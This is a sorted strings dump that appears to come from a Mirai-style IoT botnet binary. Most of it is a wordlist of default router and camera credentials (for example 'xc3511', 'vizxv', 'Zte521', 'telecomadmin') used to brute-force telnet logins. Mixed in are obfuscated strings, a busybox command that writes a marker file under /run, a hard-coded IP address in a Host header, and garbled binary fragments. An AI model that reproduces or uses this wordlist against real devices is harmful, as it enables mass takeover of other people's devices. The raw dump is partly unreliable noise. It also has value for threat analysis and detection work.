 
!
---
````````
"??$
#%  ?"$
$<' 2?f
#)#$5=
$5<>5$
$5<>5$14=9>
$5<53?=
$5<53?=14=9>
*$5i(ae
=$759& agad
$#7?9>7?>
$9>9
"??$abc
$ /bin/busybox echo -e '\x6b\x61\x6d\x69/run' > /run/.nippon; /bin/bus
$??"P
0
00000000
059AnkJ
070admin
1<
1>;?
1>$#<!
1001chin
1111
111111
1111111
12
123
123123
1234
12341234
12345
123456
1234567
12345678
123456789
1234567890
12345z
1234horses
1234qwer
123abc
1 3
 1##'?"4
141388
14=9>
14=9>=9=969
#1=#%>7
'17?
185$*9 h
1< 9>5
1988
19"<9&5
1cDuLJ7c
1q2w3e
20080826
2010vesta
2011020110
2011vsta
20150602
21iulie954044
22222
:&2*4
24
2<5>45"
25802580
2601hx
263297
#'#2*;7>
2oiidxii22
&3
:&3
#=314=9>
31=5"1
3%26
3%26:58/
3?452)$5"
362729
381>75=5
389>1abc
3ascotel
(3ceaa
3com
3ep5w2u
3UJUh2VemEfUtesEchEC2d2e
4&"
&?416?>5
4321
4"51=2?(
4561%<$
4&"beh`bbb
#?<?;5)
%#5"
5
!'5"$)
'5#$`45=
>5$751"a
!'5"$)%9? 
5>$%")a>;
500
"51<$5;
%#5"14=9>
>5'?"1>7
>5'?"1>75hhhhhhhh
54321
54gem@DMIN42
=5"<9>
5 93"?%$5"
?5<9>%(abc
5up
6$ 
>6<53$9?>
66123456789
666666
6<9"14=9>
6945<abc
/*6.=_ja
>=7('1
>=7('1 91
#&7?495
7%5#$
7ujMko0admin
7ujMko0vizxv
817
817 ?<=a
(=849
(=84 93
(=849 3
&84ab`f
*8?>7(9>7
87b(`
888888
88888888
89;&9#9?>
89ceah
8c3
`"=<8g!>-/!
(8<'h
8Jg0SR8K50
%<9>%(
&9*(&
9
9 31="$ece`
9311
=93"?2%#9>5##
>9=41
99"53$
'9>a4?'#
a1sev5y
a1sev5y7c39k
aaaa
aaaaaaa
*#%>aahh
;<&abc
abc
abc123
abcd
abcde
abcdefghi`
ac88
adaptec
adm
adm1234intelecom
aDm8H%MdA
admin
Admin
admin123
admin1234
admin26513728
adminadmin
admin@HG659
administrator
adminlvjh123
admin@mimifi
admin@mymifi
adminpass
admintelecom
adminttd
A;F
ahetzip8
alpine
altslq
anie2013
anko
annie2012
annie2013
annie2014
annie2015
annie2016
antslq
apix
aquario
Asante
ascend
asteriskftp
asus
atc123
&b=
&b= "$
b39Tlv
,ba234
b`aa&#$1
badg3r5s
bayandsl
beardropper
b``h`hbf
BHRBN!
bin
blender
bluehorse
BNOODBU!
BrAhMoS@15
calvin
cat1029
cdcl123445
CD@SESNQQDS!
cellit
CenturyL1nk
changeme
chtngpon
chtsgpon
chzhdpl
cisco
Cmcc10086
CMCCAdmin
cms500
c@ntv2000
comcast
Cristi#1978
cs2012
CTLSupport12
CUAdmin
Cuc@YHfw
cu@Hnunicom
cunmgadmin
D13hh[
daemon
davox
DCGDEv
debug
debug124
defa
default
device
Digicel
DLKT2006020
DLKT20060205
DLKT20090202
DLKT93319
dottie
DQVT
dreambox
e``
e10adc39
e2008jl
e8ehome
e8ehome1
e8ehomeasb
e8telnet
elfalg
@ELHO
enable
epicrouter
epon
EPON
f2%'
facepunch
fiberhome
fidel123
Fireitup
firetide
fivranne
Focushns
forgot
founder88
friend
ftp
fucker
g%:;?`14=9>
<=gael
gdcuadmin
GE
GeNeXiS@19
[GEPON]
GHSDUHED!
GM8182
GMB128
gpon
Gponinstalador@123
gpon@Vnt00
gro
grouter
>g:ue=
guest
gw1admin
h@32LuyD
h3c
hadoop
hagpolm1
hahb
helpme
hg2x0
hhhhhh
hi3518
hikvision
hkipc2016
hme12345
ho4uku6at
homebro
honeypot
Host: 91.199.118.155
HQB@L!
HQB@L~SU
@HuaweiHgw
HuaweiUser
huigu309
hunt5759
HWMT8007079
icatch99
iDirect
ifconfig
ikwb
[INOFYHOF!
ipc71a
ipcam
ipcam_rt5350
IPCam@sw
Is$uper@dmin
ivdev
IY!
j
jA%5m
jnior
juantech
jvbzd
jvc
K
keomeo
KL@UHeZ0
klv123
klv1234
koleos1975
kyivstar
linux
linuxshell
lJwpbo6
LTEcpe
m3tr0r00t
manager
md
meinsm
merlin
MkVQCN
motorola
mychinahost.cn
nagios
nasadmin
NDMHO
nE
netgear
netscreen
neworange88888888
newsheen
nmgcuadmin
nmgx_wapia
null
NULL
nvren
nYIMVrf
oelin
oelinux123
oelinux1234
oooooo
openelec
openvpnas
oracle
OxhlwSG8
P@55w0rd!
panger123
par0t
pass
Pass
Passw0rd
password
Password
PlsChgMe1
plumeria00
pointofsale
Pon521
postgres
private
P@ssw0rd
public
qazwsx
qazxsw
qwerty
QwestM0dem
R
r007F
rasberrypie
raspberry
realtek
red35inter
rGfPogR
!root
root
Root
ROOT
root126
ROOT500
root621
rootpass
rootpassword
router
RRI!
ruijie
s
S2fGqNFs
sa778899
samsung
Sc8a1
service
SgatDVQ8SHUrrD6s
sh
shell
sky
smcadmin
snnu!
SNNU
solokey
spectrum
SSPE240006A03
SUGAR2A041
superonline
superuser
supervisor
support
support123
svgodie
switch
synnet
system
t0talc0ntr0l4!
t3mp0Pa55
tattoo@home
taZz@23
taZz@23495859
tech
TE: deflate,gzip;q=0.3
telco
telecomadmin
telnet
telnetadm
telnetadmin
test
tgm...
tl
tl789
tlJwpbo6
tluafed
toor
tplink
true
tsgoingon
tslinux
ttcn@77CN
ttnet
twe8ehome
ubnt
ubuntu
uClinux
uid=0
UNNS!
upsetdac
Upvel321*/-+
Uq-4GIt3M
user
userEp
usuario
UU@MBOUSM!
uzirolog
v2mprt
vertex25ektks123
vhd1206
viktor
vizxv
vnpt
vodafone
vodaphone
wabjtam
wago
warmWLspot
webadmin
Win1doW$
win1dows
wrgn23_dlwbr_dir600b
wrgn39_dlob.hans_dir645_V1
xc3511
xc3518
xc3551
xirtam
xJ4pCYeW
xmhdipc
xmhdpic
z6dUABtl270qRxt7a2uG
zain
zhone
zhongxing
zlxx
zlxx.
ZmqVfoSIP
zsun
zsun1188
zte
zte510
Zte521
Zte531z
zte9x15
zteadmin123
ztonpk
ZTV5.5.0a
Zxic521
zyad1234
zyad5001
